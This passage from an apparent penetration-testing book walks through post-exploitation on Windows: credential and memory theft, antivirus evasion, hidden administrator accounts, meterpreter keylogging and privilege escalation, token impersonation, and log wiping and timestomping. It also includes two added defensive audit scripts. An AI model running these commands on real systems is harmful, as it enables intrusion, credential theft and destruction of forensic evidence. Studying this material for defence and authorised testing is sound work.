• The password files (/etc/passwd and /etc/shadow) 

• The configuration files and public/private keys in the .ssh directory 

• The public and private key rings that may be contained in the 
.gnupg directory 

• The e-mail and data files 

In a Windows system, the attacker will target the following: 

• The system memory, which can be used to extract passwords, encryption 
keys, and so on 

• The system registry files 

• The Security Accounts Manager (SAM) database that contains hashed 
versions of the password, or alternative versions of the SAM database which 
may be found in %SYSTEMROOT%\repair\SAM and 
%SYSTEMROOT%\System32\config\RegBack\SAM 

• Any other password or seed files used for encryption 

• The e-mail and data files 

Don't forget to review folders that contain temporary items, such 
as attachments. For example, UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\ 
may contain files, images, and cookies that may be of interest. 
As stated, the system memory contains a significant amount of information for any 
attacker. Therefore, it is usually a priority file that you need to obtain. The system 
memory can be downloaded as a single image file from several sources as follows: 

• By uploading a tool to the compromised system and then directly 
copying the memory (the tools include Belkasoft RAM Capturer, 
Mandiant Memoryze, and MoonSols DumpIt). 

• By copying the Windows hibernation file, hiberfil.sys, and then using 
Volatility to decrypt and analyze the file. Volatility, found on Kali in the 
Forensics menu, is a framework that was written to analyze memory 
dumps from the system RAM and other files containing system memory. It 
relies on plugins written in Python to analyze the memory and extract data, 
such as encryption keys, passwords, registry information, processes, and 
connectivity information. 

• By copying a virtual machine and converting the VMEM file to a 
memory file. 



If you upload a program designed to capture memory onto a compromised 
system, it is possible that this particular application will be identified 
as malicious software by an antivirus software. Most antivirus software 
applications recognize the hash signature and behavior of memory 
acquisition software, and act to protect the sensitive contents of the physical 
memory by raising an alarm if it is at risk of disclosure. The acquisition 
software will be quarantined, and the target will receive a warning alerting 
them of the attack. 




To avoid this, use Metasploit Framework to run the executable completely 
in the target's memory using the following command: 

meterpreter > execute -H -m -d calc.exe -f <memory executable + parameters> 

The previous command executes calc.exe as a dummy executable 
but uploads the memory acquisition executable to run in its process 
space instead. 

The executable doesn't show up in process lists, such as Task Manager, and 
detection using data forensic techniques is much harder because it's not 
written to disk. Furthermore, it will avoid the system's antivirus software, 
which generally does not scan the memory space in search of malware. 
Once the physical memory has been downloaded, it can be analyzed using Volatility 
Framework, a collection of Python scripts designed to forensically analyze memory. 
If the operating system is supported, Volatility will scan the memory file and extract 
the following: 

• The image information and system data sufficient to tie the image to its 
source system. 

• The running processes, loaded DLLs, threads, sockets, connections, 
and modules. 

• The open network sockets and connections, and recently opened 
network connections. 

• The memory address, including physical and virtual memory mapping. 

• The LM/NTLM hashes and LSA secrets. LanMan (LM) password hashes 
are Microsoft's original attempt at protecting passwords. Over the years, it 
has become simple to break them and convert the hashes back into an actual 
password. NT LanMan (NTLM) hashes are more recent and resilient to 
attack. However, the LM hashes are usually still stored alongside the NTLM 
versions for the purpose of backward compatibility. Local Security Authority (LSA) stores 
"secrets" that are local passwords: remote access (wired or wireless), VPN, 
autologon passwords, and so on. Any passwords stored on the system are 
vulnerable, especially if the user reuses passwords. 

• Specific regular expressions or strings stored in memory. 

Using the sample image for a system infected with Zeus malware 
(https://code.google.com/p/volatility/wiki/SampleMemoryImages), we'll use Volatility 
Framework to extract the encrypted LanMan password hashes. 

The first step is to determine the type of image and the operating system using the 
following command: 

root@kali:/usr/share/volatility# python vol.py imageinfo -f /root/Desktop/zeus.vmem 
The execution of the previous command is shown in the following screenshot: 

Volatile Systems Volatility Framework 2.2 
Determining profile based on KDBG search... 

          Suggested Profile(s) : WinXPSP2x86 / WinXPSP3x86 (Instantiated with WinXPSP2x86) 
                     AS Layer1 : JKIA32PagedMemoryPae (Kernel AS) 
                     AS Layer2 : FileAddressSpace (/root/Desktop/zeus.vmem) 
                      PAE type : PAE 
                           DTB : 0x319000L 
                          KDBG : 0x80544ce0 
          Number of Processors : 1 
     Image Type (Service Pack) : 2 
                KPCR for CPU 0 : 0xffdff000 
             KUSER_SHARED_DATA : 0xffdf0000 
           Image date and time : 2010-08-15 19:17:56 UTC+0000 
     Image local date and time : 2010-08-15 15:17:56 -0400 



The hivelist plugin will print out the initial virtual memory location for the various 
registry hives when it is called using the following command: 

root@kali:/usr/share/volatility# python vol.py hivelist -f /root/Desktop/zeus.vmem 

The execution of the previous command is shown in the following screenshot: 

root@kali:/usr/share/volatility# python vol.py hivelist -f /root/Desktop/zeus.vmem 
Volatile Systems Volatility Framework 2.2 
Virtual    Physical   Name 
---------- ---------- ---- 
0xe1c49008 0x036dc008 \Device\HarddiskVolume1\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat 
0xe1c41b60 0x04010b60 \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT 
0xe1a39638 0x021eb638 \Device\HarddiskVolume1\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat 
0xe1a33008 0x01f98008 \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT 
0xe153ab60 0x06b7db60 \Device\HarddiskVolume1\WINDOWS\system32\config\software 
0xe1542008 0x06c48008 \Device\HarddiskVolume1\WINDOWS\system32\config\default 
0xe1537b60 0x06ae4b60 \SystemRoot\System32\Config\SECURITY 
0xe1544008 0x06c4b008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM    ◄ 
0xe13ae580 0x01bbd580 [no name] 
0xe101b008 0x01867008 \Device\HarddiskVolume1\WINDOWS\system32\config\system ◄ 



In order to dump the hashes, the initial virtual memory locations of both the SAM and 
SYSTEM hives are required. Using the following command the results are piped to a 
comma-delimited file to be directly imported by a password-cracking application: 

root@kali:/usr/share/volatility# python vol.py hashdump -f /root/Desktop/zeus.vmem -y 0xe101b008 -s 0xe1544008 >> /root/Desktop/hashdump.csv 
The execution of the previous command is shown in the following screenshot: 

root@kali:/usr/share/volatility# python vol.py hashdump -f /root/Desktop/zeus.vmem -y 0xe101b008 -s 0xe1544008 
Volatile Systems Volatility Framework 2.2 
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: 
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
HelpAssistant:1000:4e857c004024e53cd538de64dedac36b:842b4013c45a3b8fec76ca54e5910581::: 
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8f57385a61425fc7874c3268aa249ea1::: 



The isolated LM hashes can be cracked using Hashcat, John the Ripper, Ophcrack, 
and Rainbow Tables. 
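As an added, defender-oriented example that is not part of the book, the following Python parses a dump in the pwdump layout that hashdump emits (user:RID:LM:NT:::) and reports what a security review would act on: accounts that still have an LM hash stored, accounts with an empty password, and accounts sharing the same NT hash (password reuse). The sample lines are constructed: the first four mirror the zeus.vmem output above, and the backupsvc line is invented to show reuse.

```python
import re

# Well-known marker values: "no LM hash stored" and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in hashdump's pwdump layout (user:RID:LM:NT:::). The first four
# lines mirror the zeus.vmem output; backupsvc is invented to show password reuse, and
# the last line shows that non-matching text is ignored.
SAMPLE_DUMP = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4e857c004024e53cd538de64dedac36b:842b4013c45a3b8fec76ca54e5910581:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8f57385a61425fc7874c3268aa249ea1:::
backupsvc:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Volatile Systems Volatility Framework 2.2
"""

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):"
)


def parse_hashdump(text):
    """Parse pwdump-style lines; anything that does not match the layout is skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append({"user": m["user"], "rid": int(m["rid"]),
                            "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return records


def audit_hashdump(text):
    """Return {user: [findings]}; an empty list means nothing to report for that account."""
    findings = {}
    for rec in parse_hashdump(text):
        issues = []
        if rec["lm"] != EMPTY_LM:
            # A populated LM field means the password is also kept in the DES-based
            # LM form, which is quickly crackable; the NoLMHash policy stops Windows
            # from storing it at the next password change.
            issues.append("LM hash stored")
        if rec["nt"] == EMPTY_NT:
            issues.append("empty password")
        findings[rec["user"]] = issues
    return findings


def shared_passwords(text):
    """Group accounts whose NT hashes are identical (same password), ignoring empty ones."""
    by_hash = {}
    for rec in parse_hashdump(text):
        if rec["nt"] != EMPTY_NT:
            by_hash.setdefault(rec["nt"], []).append(rec["user"])
    return {h: sorted(users) for h, users in by_hash.items() if len(users) > 1}


def report(text):
    """Human-readable summary lines for the dump."""
    lines = []
    for user, issues in audit_hashdump(text).items():
        lines.append(f"{user}: {', '.join(issues) if issues else 'ok'}")
    for users in shared_passwords(text).values():
        lines.append("same password: " + ", ".join(users))
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_DUMP)))
```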

Creating additional accounts 

The following commands are highly invasive and are usually detected by the system 
owner during the incident response process. However, they are frequently planted 
by an attacker to draw attention away from more persistent access mechanisms. 
Refer to the following table: 



net user attacker password /add 
    Creates a new local account with a user called attacker with the 
    password as password. 

net localgroup administrators attacker /add 
    Adds the new user attacker to the local administrator's group. In some 
    cases, the command will be net localgroup administrators /add attacker. 

net user username /active:yes /domain 
    Changes an inactive or disabled account to active. In a small 
    organization, this will attract attention. Large enterprises with poor 
    password management can have 30 percent of their passwords flagged as 
    "inactive," so it may be an effective way to gain an account. 

net share name$=C:\ /grant:attacker,FULL /unlimited 
    Shares C: (or another specified drive) as a Windows share, and grants 
    the user (attacker) full rights to access or modify all of the content 
    on that drive. 
If you create a new user account, it will be noticed when anyone logs onto the 
welcome screen of the compromised system. To make the account invisible, you need 
to modify the registry from the command line using the following reg command: 

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList /V account_name /T REG_DWORD /D 0 

This will modify the designated registry key to hide the account of the user (/v). 
Again, there may be special syntax requirements based on the specific version of the 
target's operating system, so determine the Windows version first and then validate 
it in a controlled test environment before implementing it against the target. 
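The following Python is an added example, not from the book, that audits a host for accounts hidden in this way from evidence collected offline: it parses constructed samples of `reg query` output for the UserList key and of `net user` output, reports hidden accounts (DWORD 0) that are not on a site allow-list, and reports UserList entries that no longer match a local account. The host name HOST01, the accounts listed and the allow-list are assumptions; on a live system the creation itself is also visible as security event 4720 (account created) and 4732 (member added to a local group).

```python
import re

USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")

# Constructed sample of `reg query "<UserList key>"` output collected from a host.
SAMPLE_REG_QUERY = USERLIST_KEY + """
    attacker         REG_DWORD    0x0
    HelpAssistant    REG_DWORD    0x0
    kiosk            REG_DWORD    0x1
    svc_old          REG_DWORD    0x0
"""

# Constructed sample of `net user` output from the same (assumed) host HOST01.
SAMPLE_NET_USER = """\
User accounts for \\\\HOST01

-------------------------------------------------------------------------------
Administrator            attacker                 Guest
HelpAssistant            SUPPORT_388945a0
The command completed successfully.
"""

# One value line of reg query output: "<name>  REG_DWORD  0x<hex>".
REG_VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+REG_DWORD\s+0x(?P<val>[0-9a-fA-F]+)\s*$")


def parse_userlist(reg_output):
    """Return {account: dword} for the values listed under the UserList key."""
    entries = {}
    for line in reg_output.splitlines():
        m = REG_VALUE_RE.match(line)
        if m:
            entries[m["name"]] = int(m["val"], 16)
    return entries


def parse_net_user(net_output):
    """Return the set of local account names printed by `net user`."""
    accounts = set()
    in_table = False
    for line in net_output.splitlines():
        if line.startswith("----"):
            in_table = True          # names start after the dashed rule
        elif line.startswith("The command completed"):
            break
        elif in_table:
            accounts.update(line.split())
    return accounts


def find_hidden_accounts(reg_output, net_output, allowlist=frozenset()):
    """Classify UserList entries.

    hidden: existing local accounts hidden from the welcome screen (DWORD 0)
            that are not on the site's allow-list of known, legitimate entries
    stale:  hidden entries with no matching local account (leftover or typo)
    """
    userlist = parse_userlist(reg_output)
    accounts = parse_net_user(net_output)
    hidden = sorted(n for n, v in userlist.items()
                    if v == 0 and n in accounts and n not in allowlist)
    stale = sorted(n for n, v in userlist.items() if v == 0 and n not in accounts)
    return {"hidden": hidden, "stale": stale}


if __name__ == "__main__":
    # HelpAssistant is passed as an assumed, site-specific allow-listed entry.
    print(find_hidden_accounts(SAMPLE_REG_QUERY, SAMPLE_NET_USER, {"HelpAssistant"}))
```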

Using Metasploit for post-exploit activities 

Metasploit was developed to support both exploit and post-exploit activities. The 
present version contains approximately 200 modules that simplify post-exploit 
activities. We will review some of the most important modules. 

In the following screenshots, we have successfully exploited a Windows XP system 
(a "classic" attack that is frequently used to validate more complex aspects of 
meterpreter). The initial step is to conduct an immediate reconnaissance of the 
network and the compromised system. 

The initial meterpreter shell is fragile and vulnerable to failure over an 
extended period of time. Therefore, once a system is exploited, we will migrate the 
shell and bind it with a more stable process. This also makes detecting the exploit 
more difficult. 

At the meterpreter prompt, enter ps to obtain a list of running processes, as shown 
in the following screenshot: 
meterpreter > ps 

Process List 
============ 

 PID   PPID  Name               Arch  Session     User 
 ---   ----  ----               ----  -------     ---- 
 0     0     [System Process]         4294967295 
 4     0     System             x86   0           NT AUTHORITY\SYSTEM 
 396   628   logon.scr          x86   0           RWBEGGS-1E69067\Administrator 
 512   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM 
 604   512   csrss.exe          x86   0           NT AUTHORITY\SYSTEM 
 628   512   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM 
 672   628   services.exe       x86   0           NT AUTHORITY\SYSTEM 
 684   628   lsass.exe          x86   0           NT AUTHORITY\SYSTEM 
 748   1264  TPAutoConnect.exe  x86   0           RWBEGGS-1E69067\Administrator 
 844   672   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM 
 860   672   svchost.exe        x86   0           NT AUTHORITY\SYSTEM 
 944   672   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE 
 1036  672   svchost.exe        x86   0           NT AUTHORITY\SYSTEM 
 1080  672   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE 
 1124  672   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE 
 1208  1036  wscntfy.exe        x86   0           RWBEGGS-1E69067\Administrator 
 1264  672   TPAutoConnSvc.exe  x86   0           NT AUTHORITY\SYSTEM 
 1424  1036  wuauclt.exe        x86   0           RWBEGGS-1E69067\Administrator 
 1460  1440  explorer.exe       x86   0           RWBEGGS-1E69067\Administrator 
 1544  672   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM 
 1680  1460  vmtoolsd.exe       x86   0           RWBEGGS-1E69067\Administrator 
 1808  672   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE 
 1976  1460  cmd.exe            x86   0           RWBEGGS-1E69067\Administrator 
 2016  672   vmtoolsd.exe       x86   0           NT AUTHORITY\SYSTEM 

The ps command also returns the full pathname for each process. This was omitted 
from the previous screenshot. The ps list identifies that c:\windows\Explorer.exe 
is running. In this particular case, it is identified with the process ID of 1460, as 
shown in the following screenshot. As this is a generally stable application, we will 
migrate the shell to that process. 

meterpreter > migrate 1460 
[*] Migrating from 1036 to 1460... 
[*] Migration completed successfully. 

Now that we have a stable shell connection to the remote system, we will use the 
meterpreter scripts that support post-exploitation activities. 
One of the first parameters to identify is: are we on a virtual machine? With the 
meterpreter session open between the compromised system and the attacker, 
the command run checkvm is issued, as shown in the following screenshot. The 
returned data indicates that This is a VMware virtual Machine. 

msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse handler on 192.168.43.130:4444 
[*] Automatically detecting the target... 
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English 
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX) 
[*] Attempting to trigger the vulnerability... 
[*] Sending stage (752128 bytes) to 192.168.43.128 
[*] Meterpreter session 1 opened (192.168.43.130:4444 -> 192.168.43.128:1094) 

meterpreter > run checkvm 
[*] Checking if target is a Virtual Machine ..... 
[*] This is a VMware Virtual Machine 



Some of the most important post-exploit modules available through meterpreter 
are described in the following table: 



run checkvm 
    Determines if a virtual machine is present. 

run getcountermeasure 
    Checks the security configuration on the exploited system (antivirus, 
    firewalls, and so on). 

run killav 
    Disables most of the antivirus services running on the compromised 
    system. This script is frequently out of date, and success should be 
    manually verified. 

run hostsedit 
    Allows the attacker to add entries to the Windows HOSTS file. This can 
    divert traffic to a different site (a fake site), which will download 
    additional tools or ensure that the antivirus software cannot connect to 
    the Internet or a local server to obtain signature updates. 

run winenum 
    Performs a command-line and WMIC characterization of the exploited 
    system. It dumps the important keys from the registry and LM hashes. 

run scraper 
    Gathers comprehensive information that has not been gathered by other 
    scripts, such as the entire Windows registry. 

run upload and run download 
    Allows the attacker to upload and download files on the target system. 

run keyscan_start, run keyscan_stop, and run keyscan_dump 
    Starts and stops a local keylogger on the exploited system. When the 
    data collection is complete, the collected text data is dumped on the 
    attacker's system. 

run getprivs 
    Attempts to enable all of the privileges available to the current 
    process. It's very useful for privilege escalation. 

run getsystem 
    Attempts to elevate privileges to the Windows SYSTEM level; grants the 
    fullest possible escalation of a user's privileges. 

run hashdump 
    Dumps the contents of the SAM database on the attacker's system. 

run getgui 
    Allows the user to enable RDP (getgui -e) and set the username and 
    password (getgui -u). The gettelnet script can be run in the same manner. 

run vnc 
    Gives the attacker a remote GUI (VNC) to the compromised system. 



One of the most effective meterpreter scripts is the Windows enumerator 
(winenum). As seen in the following screenshot, it uses both command-line and 
WMIC calls to fully characterize the target system: 



meterpreter > run winenum 
[*] Running Windows Local Enumeration Meterpreter Script 
[*] New session on 192.168.43.128:445... 
[*] Saving general report to /root/.msf4/logs/scripts/winenu 
[*] Output of each individual command is saved to /root/.msf 
[*] Checking if RWBEGGS-1E69067 is a Virtual Machine ..... 
[*] UAC is Disabled 
[*] Running Command List ... 
[*]     running command netstat -vb 
[*]     running command netstat -ns 
[*]     running command net accounts 
[*]     running command route print 
[*]     running command net view 
[*]     running command netstat -nao 
[*]     running command ipconfig /displaydns 
[*]     running command ipconfig /all 
[*]     running command arp -a 
[*]     running command cmd.exe /c set 
[*]     running command tasklist /svc 
[*]     running command net group administrators 
[*]     running command net view /domain 
[*]     running command netsh firewall show config 
[*]     running command net localgroup administrators 
[*]     running command net localgroup 
[*]     running command net user 
[*]     running command net group 
[*]     running command net share 
[*]     running command net session 
[*]     running command gpresult /SCOPE USER /Z 
[*]     running command gpresult /SCOPE COMPUTER /Z 
In addition to the enumeration, the winenum script also dumps the registry and 
collects the system hashes for decryption as shown in the following screenshot: 



[*] Running WMIC Commands .... 
[*]     running command wmic share get name,path 
[*]     running command wmic nteventlog get path,filename,writeable 
[*]     running command wmic netlogin get name,lastlogon,badpasswordcount 
[*]     running command wmic netclient list brief 
[*]     running command wmic netuse get name,username,connectiontype,localname 
[*]     running command wmic logicaldisk get description,filesystem,name,size 
[*]     running command wmic volume list brief 
[*]     running command wmic service list brief 
[*]     running command wmic group list 
[*]     running command wmic useraccount list 
[*]     running command wmic qfe 
[*]     running command wmic product get name,version 
[*]     running command wmic rdtoggle list 
[*]     running command wmic startup list full 
[*] Extracting software list from registry 
[*] Dumping password hashes... 
[+] Hashes Dumped 
[*] Getting tokens... 
[*] All tokens have been processed 
[*] Done! 



The meterpreter comes with several useful libraries that support complex 
functions. For example, the espia library supports screenshots of the compromised 
system via the following commands: 

meterpreter > use espia 
Loading extension espia...success. 
meterpreter > screenshot /Desktop/target.jpeg 
Screenshot saved to: /root/xsWoDDbW.jpeg 

The stdapi library allows a remote attacker to manipulate a webcam by 
collecting audio and video from the compromised system and relaying that 
data back to the attacker. 
Escalating user privileges on a compromised host 

It is usually possible to get Guest or User access to a system. Frequently, the attacker's 
ability to access important information will be limited by such reduced privilege levels. 
Therefore, a common post-exploit activity is to escalate access privileges from Guest 
to User to Administrator and, finally, to system. This upward progression of gaining 
access privileges is usually referred to as vertical escalation. 

The user can implement several methods to gain advanced access credentials, 
including the following: 

• Employ a network sniffer and/or keylogger to capture transmitted user 
credentials (dsniff is designed to extract passwords from live transmissions 
or a pcap file saved from a Wireshark or tshark session). 

• Perform a search for locally stored passwords. Some users collect passwords 
in an e-mail folder (frequently called passwords). Since password reuse and 
simple password construction systems are common, the passwords that are 
found can be employed during the escalation process. 

NirSoft (www.nirsoft.net) produces several free tools that can be uploaded 
to the compromised system using meterpreter to extract passwords from 
the operating system and applications that cache passwords (mail, remote 
access software, FTP, and web browsers). 

• Dump the SAM and syskey files using meterpreter or applications such as 
hobocopy, fgdump, and pwdump (these can be uploaded on the target using 
meterpreter). 

• Inject malicious code directly into a service running at the system level using 
a tool such as process injector (www.tarasco.org/security/Process_Injector/). 

• When some applications load, they read dynamic link library (DLL) files 
in a particular order. It is possible to create a fake DLL with the same 
name as a legitimate DLL, place it in a specific directory location, and 
have the application load and execute it, resulting in elevated privileges 
for the attacker. Several applications are known to be vulnerable to such 
DLL hijacking (www.exploit-db.com/dll-hijacking-vulnerable-applications/). 
• Apply an exploit that uses a buffer overflow or other means to 
escalate privileges. 

• Execute the getsystem script, which will automatically escalate 
administrator privileges to the system level, from the meterpreter prompt. 




Windows 7 and 2008 don't allow remote access to administrative shares, 
such as ADMIN$, C$, and so on, from untrusted systems. These shares 
may be required for meterpreter scripts, such as incognito, or to 
support attacks over SMB. To address this issue, add 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 
to the registry, and add a new DWORD (32-bit) key 
named LocalAccountTokenFilterPolicy and set the value to 1. 



Replaying authentication tokens using incognito 

One particularly interesting meterpreter library is incognito, which allows you 
to impersonate and replay user tokens. Tokens are temporary keys that allow you to 
access network and system resources without needing to provide your password or 
other credentials with each particular access. These tokens persist on a system until it 
is rebooted. 



Once you have compromised a system, you can use tokens to impersonate a previous 
user who created tokens, without the need to crack the user's password. This token 
impersonation may allow an attacker to escalate their privileges. 

At the prompt, type the following: 

use incognito 

The execution of the previous command is shown in the following screenshot: 



Incognito Commands 
================== 

    Command              Description 
    -------              ----------- 
    add_group_user       Attempt to add a user to a global group with all tokens 
    add_localgroup_user  Attempt to add a user to a local group with all tokens 
    add_user             Attempt to add a user with all tokens 
    impersonate_token    Impersonate specified token 
    list_tokens          List tokens available under current user context 
    snarf_hashes         Snarf challenge/response hashes for every token 
The first step is to identify all of the valid tokens that are present on the 
compromised system. The number of tokens that you can see will depend on the 
level of access that was initially used to compromise the target system. 

You will also see that there are two types of tokens, as shown in the following 
screenshot. Delegation tokens support interactive logons (for example, logging onto 
a system locally or via a remote desktop). Impersonate tokens are for noninteractive 
sessions, such as for when a system connects to a network drive. 

meterpreter > list_tokens -u 
[-] Warning: Not currently running as SYSTEM, not all tokens will be available 
             Call rev2self if primary process token is SYSTEM 

Delegation Tokens Available 
======================================== 
RWBEGGS-1E69067\Administrator 

Impersonation Tokens Available 
======================================== 
No tokens available 



As you can see, a delegation token has been identified as an Administrator. If we 
can impersonate this token, we can assume its privileges. 

When invoking the impersonate_token command in incognito (as shown in the 
following screenshot), note that two backslashes are required in the command: 

meterpreter > impersonate_token RWBEGGS-1E69067\\Administrator 
[-] Warning: Not currently running as SYSTEM, not all tokens will be available 
             Call rev2self if primary process token is SYSTEM 
[+] Delegation token available 
[+] Successfully impersonated user RWBEGGS-1E69067\Administrator 



Now, if we run the shell command from the meterpreter prompt and enter whoami, 
it will identify us as the administrator whose token we impersonated. 
Manipulating access credentials with Windows Credential Editor 

The Windows Credential Editor (WCE) — http://www.ampliasecurity.com/research/wcefaq.html — 
is a refined version of the incognito script. It is available 
in 32-bit and 64-bit versions as well as a "universal" version that is claimed to be 
workable on all Windows platforms. WCE allows users to do the following: 

• Perform pass-the-hash attacks on Windows systems 

• Collect NTLM credentials from the system memory (with or without 
code injection) 

• Collect Kerberos tickets from Windows systems 

• Use the collected Kerberos tickets on other Windows or Unix systems 
to gain access 

• Dump cleartext passwords stored by Windows systems 
(see the following section) 

To use WCE, upload the executable to the compromised system from the 
meterpreter prompt. Then, initiate an interactive shell and execute WCE. As you 
can see in the following screenshot, the -w option readily extracted the cleartext 
Administrator password: 

meterpreter > shell 
Process 3868 created. 
Channel 2 created. 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

c:\>wce.exe -w 
wce.exe -w 
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 
Use -h for help. 

DigitalDefence\RWBEGGS-1E69067:darkstar 
Administrator\RWBEGGS-1E69067: 
NETWORK SERVICE\WORKGROUP: 
Escalating from Administrator to SYSTEM 

Administrator privileges allow an attacker to create and manage accounts and access 
most data available on a system. However, some complex functionality mandates 
that the requester have system level access privileges. There are several ways to 
continue this escalation to the system level. The most common is to use the at 
command, which is used by Windows to schedule tasks for a particular time. The at 
command always runs with privileges at the system level. 

Using an interactive shell (enter shell at the meterpreter prompt), open a 
command prompt and determine the compromised system's local time. If the time 
is 12:50 P.M. (the at function uses a 24-hour notation), schedule an interactive 
command shell for a later time, as shown in the following screenshot: 

C:\>at 12:51 /interactive cmd 
at 12:51 /interactive cmd 
Added a new job with job ID = 1 



After the at task was scheduled to run, reconfirm your access privileges at the 
meterpreter prompt, as shown in the following screenshot: 

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM 



As you can see, the privileges have been escalated to the system level. 

Accessing new accounts with horizontal escalation 

In horizontal escalation, the attacker retains their existing credentials but uses them 
to act on a different user's account. For example, a user on compromised system A 
attacks a user on system B in an attempt to compromise them. 

We will use horizontal escalation attacks when we review some attack vectors, such 
as remote access attacks. 







Post Exploit - Action on the Objective 



Covering your tracks 

Once a system has been exploited, the attacker must cover their tracks to 
avoid detection, or at least make the reconstruction of the event more difficult for 
the defender. 

An attacker may completely delete the Windows event logs (if they are being actively 
retained on the compromised server). This can be done via a command shell to the 
system and using the following command: 

C:\> del %WINDIR%\*.log /a/s/q/f 

The command directs for all of the logs to be deleted (/a), including the files 
from all of the subfolders (/s). The /q option disables all of the queries, asking for 
a yes or no response, and the /f option forcibly removes the files, making recovery 
more difficult. 



This can also be done from the meterpreter prompt by issuing the command 
clearev. This will clear the application, system, and security logs from the target 
(there are no options or arguments for this command). 

Ordinarily, deleting a system log does not trigger any alerts to the user. In fact, most 
organizations configure logging so haphazardly that missing system logs are treated 
as a possible occurrence, and their loss is not deeply investigated. 

Metasploit has an additional trick up its sleeve — the timestomp option allows 
an attacker to make changes to the MACE parameters of a file (the last Modified, 
Accessed, Created, and MFT Entry modified times of a file). Once a system has been 
compromised and a meterpreter shell established, timestomp can be invoked, as 
shown in the following screenshot: 



meterpreter > timestomp -h 

Usage: timestomp file_path OPTIONS 

OPTIONS: 

    -a <opt>  Set the "last accessed" time of the file 
    -b        Set the MACE timestamps so that EnCase shows blanks 
    -c <opt>  Set the "creation" time of the file 
    -e <opt>  Set the "mft entry modified" time of the file 
    -f <opt>  Set the MACE of attributes equal to the supplied file 
    -h        Help banner 
    -m <opt>  Set the "last written" time of the file 
    -r        Set the MACE timestamps recursively on a directory 
    -v        Display the UTC MACE values of the file 
    -z <opt>  Set all four attributes (MACE) of the file 






For example, C:\ of the compromised system contains a file named readme.txt. 
The MACE values for this file indicate that it was created recently, as shown in the 
following screenshot: 

meterpreter > timestomp README.txt -v 
Modified      : 2013-09-16 03:25:15 -0400 
Accessed      : 2013-09-16 07:04:16 -0400 
Created       : 2013-09-16 07:04:16 -0400 
Entry Modified: 2013-09-16 07:04:47 -0400 



If we want to hide this file, we may move it to a cluttered directory, such as 
windows\system32. However, the file would be obvious to anyone who sorted the 
contents of that directory by creation date or another MAC-based attribute. 
Therefore, to copy the MAC information from the cmd.exe file to the readme.txt 
file, use the following command: 

meterpreter> timestomp README.txt -f C:\\WINDOWS\\system32\\cmd.exe 

We can also choose to blank out the MAC data using the -b switch. As you can see 
in the following screenshot, we have chosen to change the MAC data to a time in the 
future (the year 2106). 

meterpreter > timestomp README.txt -v 
Modified      : 2013-09-16 03:25:15 -0400 
Accessed      : 2013-09-16 07:04:16 -0400 
Created       : 2013-09-16 07:04:16 -0400 
Entry Modified: 2013-09-16 07:04:47 -0400 
meterpreter > timestomp README.txt -b 
[*] Blanking file MACE attributes on README.txt 
meterpreter > timestomp README.txt -v 
Modified      : 2106-02-07 01:28:15 -0500 
Accessed      : 2106-02-07 01:28:15 -0500 
Created       : 2106-02-07 01:28:15 -0500 
Entry Modified: 2106-02-07 01:28:15 -0500 
Such a change will attract the attention of an investigator, but they will not be able to 
use the data for a forensic analysis. What do the attributes look like from the original 
Windows platform? If the system administrator calls the system properties of the file, 
the creation and modification dates have been changed back to the year 1601 (the 
date used by Microsoft as the initial system start time). In contrast, the last accessed 
time for the file remains accurate. You can see this in the following screenshot: 



README.txt Properties (General tab) 

    Type of file:  Text Document 
    Opens with:    Notepad 
    Location:      C:\ 
    Size:          8.41 KB (8,614 bytes) 
    Size on disk:  12.0 KB (12,288 bytes) 
    Created:       Monday, January 01, 1601, 12:00:00 AM 
    Modified:      Monday, January 01, 1601, 12:00:00 AM 
    Accessed:      Today, September 16, 2013, 6:46:43 AM 



Although this is expected behavior, it still provides clues to an investigator. In order 
to completely foul up an investigation, an attacker may recursively change all of the 
